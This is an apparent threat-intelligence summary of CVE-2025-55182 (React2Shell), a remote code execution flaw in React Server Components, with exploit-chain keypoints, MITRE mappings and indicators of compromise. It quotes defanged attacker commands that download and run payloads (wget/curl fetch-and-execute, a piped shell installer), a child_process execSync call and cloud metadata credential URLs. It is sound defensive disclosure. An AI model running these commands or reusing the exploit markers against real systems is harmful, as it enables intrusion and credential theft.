CVE-2025-55182 (React2Shell) is a critical (CVSS 10.0) pre-authentication remote code execution in React Server Components that allows attackers to craft Flight payload chunks to reach the Function constructor and execute arbitrary Node.js commands. Trend observed widespread in-the-wild exploitation and multiple campaigns (e.g., emerald, nuts) delivering Cobalt Strike, Mirai variants, Nezha, Sliver, and SecretâHunter payloads. #CVE-2025-55182 #React2Shell
Keypoints
- The root cause is a deserialization bug in ReactFlightReplyServer.js where value.hasOwnProperty(i) performs a method lookup on untrusted objects, allowing attackers to shadow hasOwnProperty and traverse prototype properties like constructor.
- The exploit chain uses four stagesâself-reference loop ($@), forcing .then execution, marking chunks as resolved_model to trigger initialization, and abusing $B Blob handling to call Function(âŚ) and execute arbitrary commands.
- Trend identified ~145 in-the-wild PoCs of varying quality, plus opportunistic mass scanning and automated exploitation targeting cloud-hosted Next.js/React apps.
- Multiple active campaigns (emerald, nuts) and payload families were observed delivering Mirai variants, Cobalt Strike beacons (CrossC2), Nezha agents, FRP, Sliver implants, cryptominers, and a SecretâHunter Node.js exfiltration tool.
- The official patch caches Object.prototype.hasOwnProperty and switches to hasOwnProperty.call(value, key), adds explicit __proto__ handling, and introduces other defenses (Proxy server module map, AES-256-GCM action encryption, prototype validation).
- Defenders should upgrade React/Next.js to the patched versions, deploy IDS/WAF patterns for Flight payload indicators (Next-Action header, $@, resolved_model, constructor:constructor, _formData.get), and treat many public PoCs as potentially malicious or backdoored.
- Trend Vision One provides detections, hunting queries, and telemetry-based IoCs and encourages auditing Server Actions, rate limiting, and considering Edge Runtime to reduce exposure.
MITRE Techniques
- [T1190 ] Exploit Public-Facing Application â Pre-auth remote code execution against React Server Components that executes code before authentication: (âpre-authentication remote code execution vulnerability affecting React Server Componentsâ).
- [T1059 ] Command and Scripting Interpreter â Attackers execute shell commands via Node.js child_process and PowerShell oneâliners (Windows): (âprocess.mainModule.require(âchild_processâ).execSync(âŚ)â, PowerShell base64 command).â
- [T1105 ] Ingress Tool Transfer â Adversaries download tooling and payloads (bots, Mirai binaries, Sliver, miners) using wget/curl: (âwget hxxp://gfxnick[.]emerald[.]usbx[.]me/bot; chmod 777 bot; ./botâ, âcurl -vk hxxps://216.238.68[.]169/ReactOS -o /root/.rtosâ).
- [T1071 ] Application Layer Protocol â Command-and-control over HTTP(S) and Cloudflare Tunnels for C2 and exfiltration: (âhxxps[://]conclusion-ideas-cover-customise[.]trycloudflare[.]comâ, âJSON-serialized, and POSTed to this endpointâ).
- [T1543 ] Create or Modify System Process â Persistence via systemd service installation observed for Cobalt Strike and other implants: (âsets a systemd service for persistenceâ, âdrops the beacon to /usr/local/rsysloâ).
- [T1053 ] Scheduled Task/Job â Use of cron @reboot and other scheduled job mechanisms to maintain persistence: (âinstalls its own cron jobs to re-download the payload every minuteâ).
- [T1539 ] Steal Cloud Instance Metadata â Harvesting cloud IMDS to obtain temporary credentials for AWS/GCP/Azure: (âhttp://169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/â, âhttp://metadata.google.internal/computeMetadata/v1/â).
- [T1082 ] System Information Discovery â Host discovery commands and defensive-reconnaissance behaviors such as whoami, systeminfo, and Defender queries: (âwhoamiâ, âcollected Microsoft Defender settingsâ).
- [T1090 ] Proxy â Use of FRP and SOCKS5 proxies for network pivoting and remote access: (âFRP (Fast Reverse Proxy)â, âfunctions as a SOCKS5 proxy for network pivotingâ).
- [T1041 ] Exfiltration Over C2 Channel â Exfiltration of discovered secrets and files via C2 channels (Cloudflare Tunnel POSTs and other C2 endpoints): (âData is deep-cleaned, JSON-serialized, and POSTed to this endpointâ).
Indicators of Compromise
- [IP Address ] observed C2 and download hosts â 193.34.213.150, 154.89.152.240, and 8 other IPs referenced for payload delivery and C2.
- [Domain ] malicious hosting and C2 domains â gfxnick[.]emerald[.]usbx[.]me (usbx.me), conclusion-ideas-cover-customise[.]trycloudflare[.]com, and 5 other domains used for payload delivery, C2, or drop sites.
- [File name / path ] payloads and persistence artifacts â bot, healthcheck.dll, /root/.rtos, /dev/shm/rtos and several other dropped binaries and staging paths.
- [Payload pattern ] Flight protocol and exploit markers in HTTP bodies/headers â Next-Action: * header, $@0 / $@1 chunk references, resolved_model, constructor:constructor, _formData.get (used to invoke Function()).
- [URLs / scripts ] download/execution commands â examples: hxxp://193[.]34[.]213[.]150/nuts/x86 (Mirai download), hxxp://38.165.44[.]205/s | sh (FRP installer), and additional malicious script URLs.
Read more: https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html